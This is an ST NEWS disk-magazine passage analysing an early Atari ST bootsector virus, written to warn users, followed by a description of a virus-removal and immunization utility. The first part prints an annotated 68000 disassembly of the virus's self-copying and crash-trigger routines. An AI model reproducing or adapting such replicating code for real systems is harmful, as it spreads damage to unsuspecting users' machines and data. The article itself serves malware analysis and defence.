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ON THE ATARI ST by Richard Kars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already have noticed,  this time's issue of ST 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filled with articles about an extraordinary  phenomenon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ppeared on the ST recently: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nglish dictionary states that a virus is 'a  contagious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sonous matter',  'the poison which causes infection' and  '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l, hurtful matter'. What this has to do with the ST? Rea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 (as  well as this time's 'Editorial')  and  you'll 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I'm tal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allow  me  to  explain what  a  'virus'  is;  is  i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equivalent of AIDS?  Now you mention it,  I think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mblance is quite striking.  AIDS isn't visible in its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s - neither is the ST's virus.  AIDS can in fact turn o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quite harmless - so can the virus. And.....AIDS can kill you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the ST's virus can do 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'virus'  can be described as something that works as  a  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: It will multiply itself while remaining unseen,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 whenever a certain condition is true.  This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 certain timer value in your computer system, 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virus  multiplications or (as is the  case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ST virus) it can become active when a certain  valu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n a certain location on a certain disk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virus  is  installed in your computer when you  boot  up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an infected disk in the boot device.  This will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drive A,  but can theoretically also be a hard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a  reset-resistant  RAMdisk.  The  virus  that's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ming  on  the ST installs itself as an extension of  the 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"get_bpb";  this routine is called from  the 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whenever a new directory is read after swapping disks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a disk has just been formatted.  Thus,  the virus can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 to any disk that you happen to read the  dierctory  fr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t also writes itself on any disk that you happen to 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r computer is infected.  Lucky enough, the current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t able to write through the write-protect notch  (i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t would be able to multiply itself on disks that are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), and is not reset-resistant (reset destroy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,  the virus might in fact be called an ingenious pie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However neat it might be, it should be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your disks!  To assist you in achieving this quest,  I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 virus killer that is also present on this ST NEW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erate article in this issue will explain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e current viru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is located on the bootsector of an infected disk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 into computer memory as you boot up your system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 disk in the boot device - ONLY WHEN THE  BOOTSECTO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DISK  IS EXECUTABLE!  On a regular ST,  the  bootsecto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 in  memory  at  $167A  (hexadecimal).  After  the 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is loaded, it is executed from that address and ada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OS function "get_bpb" so that it jumps through  the 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 after calling the actual  "get_bpb".  Then,  it  re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to  the computer.  Your system is now infected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waits to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 have  a look at the disassembled listing  of  an  in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, loaded in memory at $5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0 BRA     $0500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3A LEA     $50000(PC),A0          Load $50000 in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3E MOVE.L  $0004C6,A1             Load _dskbufp in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44 ADDA.L  #$00000600,A1          Add $600 to _dskbuf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4A MOVE.L  A1,A2                  Copy A1 to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4C MOVE.W  #$0100,D0              Sector length in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50 MOVE.W  (A0)+,(A1)+            Copy bootsecto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52 SUBQ.W  #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54 BPL     $05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56 LEA     $050064(PC),A0         Address of instal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5A LEA     $050000(PC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5E SUBA.L  A1,A0                  Rela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60 ADDA.L  A0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62 JMP     (A2)                   Execute instal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64 LEA     $05012C(PC),A0         Buffer address fo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t_bpb'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68 MOVE.L  $000472,(A0)           Copy 'get_bpb'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6E LEA     $05007A(PC),A0         Install new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72 MOVE.L  A0,$000472             Copy it to 'get_bpb'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78 RTS                            Virus is now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follows the actual adapted 'get_bpb' function.  This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 virus,  executed whenever the BIOS function 'get_bpb'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7A LINK    A6,#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7E MOVE.W  $0008(A6),-(A7)        Current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82 MOVE.L  $05012C(PC),A0         Load old 'get_bpb'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86 JSR     (A0)                   Execute normal 'get_bp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88 ADDQ.L  #2,A7                  Restor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8A MOVEM.L D0/A0-A1,-(A7)         Save registers for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8E LEA     $050130(PC),A0         Load address of $0001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92 TST.W   (A0)                   $00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94 BEQ     $050124                No; leav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98 MOVE.L  $0004C6,A0             Get _dskbu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9E MOVE.W  (A0),D0                Get first two bytes of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A0 CMP.W   #$6038,D0              Is it a virus bootsec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A4 BEQ     $050104                Yes! Then check if ke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A6 LEA     $050000(PC),A1         Start of bootsect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AA MOVE.W  (A1)+,(A0)+            Copy branch to dis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AC MOVE.W  (A1)+,(A0)+            Cop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AE MOVE.W  (A1)+,(A0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B0 ADDA.L  #$00000032,A1          Jump over bootsector B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B6 ADDA.L  #$00000032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BC MOVE.W  #$00E7,D0              $E7 bytes still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C0 MOVE.W  (A1)+,(A0)+            Copy to disk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C2 SUBQ.W  #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C4 BNE     $050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C6 MOVE.W  #$0001,-(A7)           Executable bootsect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CA MOVE.W  #$FFFF,-(A7)           Don't change dis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CE MOVE.L  #$FFFFFFFF,-(A7)       Don't change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D4 MOVE.L  $0004C6,-(A7)          Address to use a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DA MOVE.W  #$0012,-(A7)           Xbios 12, Proto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DE TRAP   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E0 MOVE.W  #$0001,-(A7)           Sectorcoun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E4 CLR.L   -(A7)                  Track and sid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E6 MOVE.W  #$0001,-(A7)           Secto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EA MOVE.W  $0008(A6),-(A7)        Curren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EE CLR.L   -(A7)                  F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F0 MOVE.L  $0004C6,-(A7)          Buffer to writ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F6 MOVE.W  #$0009,-(A7)           Xbios 9, Flop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FA TRAP   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FC ADDA.L  #$00000022,A7          Correct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02 BRA     $050124                Leave viru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04 MOVE.W  $0002(A0),D0           Second and third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sector to D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08 CMP.W   #$1092,D0              Key s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0C BNE     $050124                No: Leave viru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where things go wrong (only if the 'key' has a valu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92 hexadeci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0E LEA     $050000(PC),A1         Bootsector adress in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12 MOVE.L  $0002(A1),D0           Address of $10920000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16 CMP.W   $0004(A0),D0           Compare with byte 3 and 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1A BGT     $05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1C JSR     (A0)                   Recursive jump - never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1E LEA     $050130(PC),A0         Address of $0001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22 CLR.W   (A0)                   Clear it to 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24 MOVEM.L (A7)+,D0/A0-A1         Exit viru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28 UNLK   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2A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2C $FC0D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30 $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in the form that I discovered is quite harmless,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 just wait until the 'key' sets the bootsector bytes 3 and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$1092......Things can go awfully wrong t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'd better start using the viruskiller in this ST NEWS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and check all your disks - especially the one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eep un-writeprotected most of the time (your work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DESTRUCTION UTILITY by Richard Kars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after I discovered that viruses were going around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,  Frank Lemmen started writing a virus killer (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eliminated  the virus from infected disks).  He  wrote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:  The  first one was filled with bugs (didn't work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and harddisks,  for example), and the second one was belie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full proof as well.  But,  as days passed,  som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or  less  major shortcomings of Frank's  new  virus  ki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ould only check drive A's infected disks (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ople who had a 5,25" driv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could only recognize one specific viru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work with it, you had to use keyboard AN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e could not IMMUNIZE disks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irus Destruction Utility"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recognizes and automatically destroys infected disks'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ormerly infected disk is also immunized (so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will not be written on it ever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also immunize your normal, non-infect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ses of doubt (any executable bootsectors) are recogniz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arned (please note:  This option was includ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DU  compatible with future viruses,  and  all  auto-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se these as well - not being a viru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 works  on drive A as well as B (easy if you  have  a  5,25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 recognizes  a  virus  that  is  already  installe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 VDU will then refuse to work!  If a virus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to your VDU disk,  simply boot with a non-infected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load the V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programs that auto-boot,  and of which the VDU will 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t 'may be infected by a virus' (there may be more -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ll  ORIGINAL  versions):   Deep  Space,  Arena,  Bratacc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glider,    Barbarian,   Terrorpods,   Obliterator,   Sapie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nel, all Aladin disks, Tai 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ook at the program (written in GfA Basic),  and the r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you how it all works.  I hope to have supplied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ful tool in your battle against viruses.  It is not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ake,  but your duty towards other ST users to f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virus! Kill 'em all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